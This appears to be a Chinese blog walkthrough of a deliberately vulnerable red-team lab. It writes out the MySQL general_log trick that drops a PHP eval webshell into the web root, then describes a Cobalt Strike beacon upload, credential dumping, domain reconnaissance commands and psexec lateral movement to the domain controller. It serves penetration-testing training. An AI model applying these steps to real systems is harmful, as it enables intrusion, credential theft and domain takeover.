ATT&CK红队评估实战红日靶场一

一:靶场环境搭建

在线靶场链接如下:

漏洞详情

1.Win7 虚拟机相当于网关服务器,所以需要两张网卡,故需要配置两个网络适配器(网卡),点击添加网络设配器,将 Win7 的网络适配器 1 设置成自定义( VMnet1 仅主机模式),网络适配器 2 设置成 NAT 模式:

2.Win2003、Win2008 网络适配器设置成自定义(VMnet1仅主机模式)即可:

3.至此网络配置完成,现在可以登进去每个服务器看一看,是不是成功获取了IP,这三台虚拟主机默认开机密码都是 hongrisec@2019。实际上域环境三台虚拟机的 IP 初始状态就已经被配置为固定的 192.168.52.XXX/24网段(同时已配置好域控 IP 必定为 192.168.52.138),故 VMware 仅主机模式的 VMnet1 网卡应注意也配置为 192.168.52.XXX/24 网段:

4.环境搭建的最后,在 Win7 外网服务器主机的 C 盘找到 PhpStudy 启动 Web 服务(模拟外网 Web 站点):

5.使用物理机可正常访问 Win7 服务器的站点:

  

二:外网边界突破

MySQL写日志Getshell

1.在物理机访问目标单位的外网站点,发现一个 MySQL 连接检测:

输入账号 root 密码 root 进行连接检测,发现连接成功:

2.使用 dirsearch 扫描下 Web 路径,发现有 phpmyadmin 路径

3.访问 phpmyadmin

4.发现存在弱口令 root/root,可成功登录后台:

5.通过 MySQL 日志导入木马。查看日志状态,执行命令:show variables like '%general%';

6.当开启 general_log 时,所执行的 SQL 语句都会出现在 stu1.log 文件中。那么如果修改 general_log_file 的值,则所执行的 SQL 语句就会对应生成对应的文件中,进而可 Getshell。故执行命令:SET GLOBAL general_log='on';

7.指定日志写入到网站根目录的shw.php 文件,执行命令:

SET GLOBAL general_log_file='C:/phpStudy/www/shw.php';

8.将一句话木马写入 shw.php 文件中。执行 SQL 语句:

SELECT '<?php eval($_POST["cmd"]);?>';

9.访问日志文件(已写入一句话木马):http://192.168.52.143/shw.php

直接上哥斯拉Getshell

10.权限判断,查看IP

通过查看用户权限发现是administrator权限

通过查看ip时发现服务器存在双网卡,可知内网IP段为192.168.52.X

三:内网信息探测

靶机CS 后门上线

1.公网运行cs服务:

2.运行CS客户端并连接公网VPS的CS服务端,然后生成 exe 可执行后门程序:

3.利用哥斯拉将生成的 exe后门文件上传到靶机

4.接着在哥斯拉中使用终端命令行执行beacon.exe,随后CS客户端可以看到靶机上线

域内信息收集

1.机器上线后,修改sleep值,同时查看一下权限:

2.这里发现权限是GOD/Administrator,这里就有一个很关键的地方,根据之前webshell中查看的ip信息,发现是存在双网卡的,这里可以判断是存在域的,所以这里先来抓取密码。

点击视图下的密码凭据可以直观的查看抓取结果

3,进行域内信息收集:

命令:shell net config Workstation 

//当前计算机名,全名,用户名,系统版本,工作站域,登陆域

命令:shell net view  

//查看局域网内其他主机名

4.端口扫描52段

5.通过扫描发现果然存在其他主机IP,发现192.168.52.138、192.168.52.141两个其他IP,查看一下视图中的目标:

四:内网横向渗透

创建隧道

横向移动

1.针对192.168.52.138和192.168.52.141进行横向移动,在目标中选取右键横向移动->psexec:

2.192.168.52.138成功上线,这里使用命令来查看信息:

命令:shell whoami

命令:shell ipconfig

命令:shell systeminfo

3.使用同样的方法攻击192.168.52.141:

4.192.168.52.141成功上线,这里使用命令来查看信息:

命令:shell whoami

命令:shell ipconfig

命令:shell systeminfo

5.这里已经拿下了域内的剩下2台机器,其中一台还是域控机器,这里就查看拓扑图:

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值